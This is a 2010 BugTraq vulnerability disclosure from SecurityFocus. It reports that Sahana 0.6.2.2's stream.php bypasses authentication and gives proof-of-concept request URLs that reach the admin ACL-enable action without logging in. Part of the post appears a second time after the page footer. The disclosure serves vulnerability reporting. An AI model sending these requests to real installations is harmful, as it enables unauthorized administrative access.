BugTraq
Back to list
|
Post reply
Sahana 0.6.2.2 Authentication Bypass
Mar 17 2010 04:54PM
Christopher (vooduhal gmail com)
Ability to completely disable authentication via stream.php and commented
out module authentication code within it.
http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.
http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
out module authentication code within it.
http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.
http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.
[ reply ]